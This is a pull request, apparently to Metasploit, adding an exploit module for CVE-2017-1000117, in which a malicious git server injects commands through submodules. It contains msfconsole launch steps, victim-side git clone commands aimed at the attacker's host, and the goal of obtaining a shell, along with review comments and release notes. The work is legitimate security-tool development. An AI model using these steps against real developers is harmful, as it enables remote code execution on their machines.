### PR TITLE
git submodule command execution (CVE-2017-1000117)

### PR DESCRIPTION
**Pull request by timwr**
Quick module for CVE-2017-1000117. A lot of code is stolen from https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/multi/http/git_client_command_exec.rb so it should probably be moved into a mixin.

## Verification

List the steps needed to make sure this thing works

- [x] Launch the exploit:
```
use exploit/multi/http/git_submodule_command_exec
set LHOST 192.168.0.2
set GIT_URI /m
exploit
```
- [x] With a vulnerable client, clone the repository:
```
git clone http://192.168.0.2:8080/m --recurse-submodules
*or*
git clone http://192.168.0.2:8080/m
cd m
git submodule update --init
```
- [x] **Verify** that you get a shell

### CODE REVIEW

**Comment by sempervictus** [comment]
As though submodules weren't evil enough. Thanks a ton, good way to remind developers to update their tools.

**Comment by busterb** [comment]
hey @timwr , would you mind writing some docs on this?

**Comment by timwr** [comment]
Sorry for the delay! Docs added

File: documentation/modules/exploit/multi/http/git_submodule_exec.md [hunk 1]
```diff
@@ -0,0 +1,62 @@
...
+
+  Example steps in this format:
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: ```use exploit/multi/http/git_submodule_command_exec```
+  1. Do: ```set SRVHOST [local host]```
+  1. Do: ```set LHOST [local host]```
+  1. Do: ```exploit```
+  1. Clone the malicous Git URI and its submodules
```
Comment (h00die) [inline documentation/modules/exploit/multi/http/git_submodule_exec.md]: malicous -> malicious

Comment (h00die) [reply documentation/modules/exploit/multi/http/git_submodule_exec.md]: im on heightened alert from 8888 for spelling issues

Comment (h00die) [reply documentation/modules/exploit/multi/http/git_submodule_exec.md]: other than that docs look good to me

Comment (timwr) [reply documentation/modules/exploit/multi/http/git_submodule_exec.md]: Great spot thanks :)

**Comment by busterb** [comment]
I made a couple of tweaks, the 2nd being important so that module docs work:
46eeb1bee0 8928197584

**Comment by busterb** [comment]
## Release Notes

This adds an exploit for CVE-2017-1000117, which emulates a malicious git server that injects a remote command payload, which is executed when the `git submodule update -i` command is executed.

**Pull request merged**